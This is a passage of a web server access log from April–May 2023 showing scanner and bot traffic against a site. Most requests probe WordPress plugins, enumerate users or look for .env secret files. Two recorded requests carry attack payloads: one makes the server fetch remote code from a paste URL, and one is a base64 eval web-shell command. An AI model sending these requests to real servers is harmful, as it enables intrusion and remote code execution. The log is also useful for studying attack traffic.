AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:08 +0700] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:12 +0700] "GET /wp-content/plugins/vc-tabs/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:15 +0700] "GET /wp-content/plugins/shortcode-addons/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:17 +0700] "GET /wp-content/plugins/dzs-zoomsounds/admin/admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:12:01:20 +0700] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:23 +0700] "GET /wp-content/plugins/superlogoshowcase-wp/css/sls-wp-admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:27 +0700] "GET /wp-content/plugins/super-interactive-maps/css/sim-wp-admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:31 +0700] "GET /wp-content/plugins/superstorefinder-wp/css/ssf-wp-admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:35 +0700] "GET /wp-content/plugins/e-signature/page-template/default/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:40 +0700] "GET /wp-content/plugins/angwp/__%20UPDATES.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:45 +0700] "GET /wp-content/plugins/ait-csv-import-export/changelog.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:49 +0700] "GET /wp-content/plugins/image-hover-effects-ultimate/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:53 +0700] "GET /wp-content/plugins/ulisting/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:56 +0700] "GET /wp-content/plugins/wp-pinterest-automatic/changelog HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:02:00 +0700] "GET /wp-content/plugins/capabilities-pro/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:02:04 +0700] "GET /wp-content/plugins/capability-manager-enhanced/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:12:02:06 +0700] "GET /wp-content/plugins/wp-automatic/css/wp-automatic.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:02:09 +0700] "GET /wp-content/plugins/wp-automatic/changelog HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:02:13 +0700] "GET /wp-content/plugins/wp-user-extra-fields/js/wpuef-configurator.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:12:02:15 +0700] "GET /wp-content/plugins/woocommerce-upload-files/js/wcuf-admin-menu.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 136.243.219.190 - - [08/Apr/2023:07:23:58 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 136.243.219.190 - - [08/Apr/2023:07:24:03 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 136.243.219.190 - - [08/Apr/2023:07:24:06 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 128.90.141.11 - - [09/Apr/2023:03:03:05 +0700] "HEAD /wordpress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:06 +0700] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:08 +0700] "HEAD /wp HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:08 +0700] "HEAD /bc HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:08 +0700] "HEAD /bk HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:09 +0700] "HEAD /backup HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:09 +0700] "HEAD /old HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:10 +0700] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:10 +0700] "HEAD /main HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.11 - - [09/Apr/2023:03:03:11 +0700] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.140.4.120 - - [09/Apr/2023:07:46:50 +0700] "GET /rindex.php?action=add¶meter=ybknnwgyfl.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.140.4.120 - - [09/Apr/2023:11:32:11 +0700] "GET /wp-content/plugins/wp-user-avatar/changelog.txt HTTP/1.1" 301 162 "yahoo.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 206.189.43.98 - - [10/Apr/2023:01:13:42 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 206.189.43.98 - - [10/Apr/2023:16:17:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.45 - - [12/Apr/2023:11:40:04 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 209.182.210.91 - - [13/Apr/2023:07:12:13 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 209.182.210.91 - - [13/Apr/2023:07:12:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 209.182.210.91 - - [13/Apr/2023:07:12:27 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 205.210.31.49 - - [14/Apr/2023:22:37:35 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 147.78.47.249 - - [14/Apr/2023:23:04:09 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Apr/2023:23:04:12 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Apr/2023:23:04:15 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Apr/2023:23:04:19 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Apr/2023:23:04:22 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 198.235.24.130 - - [15/Apr/2023:15:26:24 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 92.204.184.3 - - [18/Apr/2023:08:33:28 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 92.204.184.3 - - [18/Apr/2023:08:33:37 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 92.204.184.3 - - [18/Apr/2023:08:33:41 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 65.154.226.166 - - [18/Apr/2023:17:42:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5563.64 Safari/537.36" 47.104.66.61 - - [22/Apr/2023:07:11:46 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 47.104.66.61 - - [22/Apr/2023:07:11:51 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 47.104.66.61 - - [22/Apr/2023:07:11:53 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 87.236.176.12 - - [23/Apr/2023:09:46:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 54.245.51.67 - - [23/Apr/2023:14:35:37 +0700] "GET / HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:41 +0700] "GET /.env HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:42 +0700] "GET /.remote HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:42 +0700] "GET /.local HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:42 +0700] "GET /.production HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:43 +0700] "GET //vendor/.env HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:43 +0700] "GET //lib/.env HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:44 +0700] "GET //lab/.env HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:44 +0700] "GET //cronlab/.env HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 54.245.51.67 - - [23/Apr/2023:14:35:45 +0700] "GET //cron/.env HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.19 (KHTML, like Gecko) Version/6.1.8 Safari/536.27" 49.12.47.181 - - [26/Apr/2023:06:20:38 +0700] "GET /wp-content/updates.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 185.183.122.143 - - [27/Apr/2023:05:27:20 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 185.183.122.143 - - [27/Apr/2023:05:27:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 185.183.122.143 - - [27/Apr/2023:05:27:28 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 144.91.106.14 - - [30/Apr/2023:11:01:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 167.94.138.127 - - [30/Apr/2023:11:20:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.51 - - [03/May/2023:10:53:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 139.59.10.149 - - [04/May/2023:05:46:22 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 139.59.10.149 - - [04/May/2023:05:46:25 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 139.59.10.149 - - [04/May/2023:05:46:27 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 54.216.242.200 - - [04/May/2023:08:46:58 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 167.248.133.50 - - [05/May/2023:08:55:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.255 - - [05/May/2023:13:49:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.16 - - [06/May/2023:04:07:40 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 167.94.138.126 - - [08/May/2023:08:52:14 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 157.245.81.31 - - [09/May/2023:03:49:15 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 157.245.81.31 - - [09/May/2023:03:49:20 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 198.235.24.169 - - [10/May/2023:01:01:40 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 147.78.47.249 - - [12/May/2023:08:37:03 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [12/May/2023:08:37:07 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [12/May/2023:08:37:10 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [12/May/2023:08:37:13 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [12/May/2023:08:37:16 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 167.94.138.34 - - [13/May/2023:07:47:44 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.85 - - [13/May/2023:08:24:26 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 64.176.81.76 - - [13/May/2023:21:06:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 198.235.24.184 - - [14/May/2023:13:41:33 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 35.233.105.185 - - [15/May/2023:04:00:35 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 35.233.105.185 - - [15/May/2023:04:00:39 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 35.233.105.185 - - [15/May/2023:04:00:43 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 35.211.132.229 - - [15/May/2023:22:02:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.132.229 - - [15/May/2023:22:02:31 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.132.229 - - [15/May/2023:22:02:35 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.132.229 - - [15/May/2023:22:02:35 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.132.229 - - [15/May/2023:22:02:35 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 198.235.24.255 - - [16/May/2023:04:27:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 87.236.176.140 - - [18/May/2023:22:11:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 167.94.138.35 - - [19/May/2023:00:05:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 43.156.147.238 - - [19/May/2023:05:44:17 +0700] "POST //wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw== HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 43.156.147.238 - - [20/May/2023:07:15:55 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 43.134.187.146 - - [25/May/2023:03:11:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 43.134.187.146 - - [25/May/2023:23:04:26 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 43.134.187.146 - - [26/May/2023:12:45:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 23.178.112.203 - - [27/May/2023:10:42:29 +0700] "GET /.well-known/acme-challenge/TSWR6N1Au0yqY0s2JTNZ0elqj5VlaUTirnyifCRnVDk HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 35.161.111.121 - - [27/May/2023:10:42:29 +0700] "GET /.well-known/acme-challenge/TSWR6N1Au0yqY0s2JTNZ0elqj5VlaUTirnyifCRnVDk HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.135.210.168 - - [27/May/2023:10:42:29 +0700] "GET /.well-known/acme-challenge/TSWR6N1Au0yqY0s2JTNZ0elqj5VlaUTirnyifCRnVDk HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 65.154.226.166 - - [27/May/2023:10:44:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux 